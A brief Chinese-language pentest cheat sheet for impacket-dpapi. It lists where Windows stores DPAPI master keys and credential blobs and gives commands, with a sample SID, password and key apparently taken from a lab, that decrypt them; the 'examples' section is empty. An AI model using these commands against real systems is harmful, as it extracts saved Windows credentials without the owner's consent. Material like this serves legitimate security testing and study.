impacket-dpapi
1. 快速利用
相关文件信息
#主密钥
C:\Users\$USER\AppData\Roaming\Microsoft\Protect\$SUID\$GUID
#blob
C:\Users\$USER\AppData\Local\Microsoft\Credentials\
C:\Users\$USER\AppData\Roaming\Microsoft\Credentials\
#解密masterkey
impacket-dpapi masterkey -file master_key -sid S-1-5-21-953262931-566350628-63446256-1001 -password 4Cc3ssC0ntr0ller
#用masterkey解密blob
impacket-dpapi credential -file blob -key 0xb360fa5dfea278892070f4d086d47ccf5ae30f7206af0927c33b13957d44f0149a128391c4
2. 例子
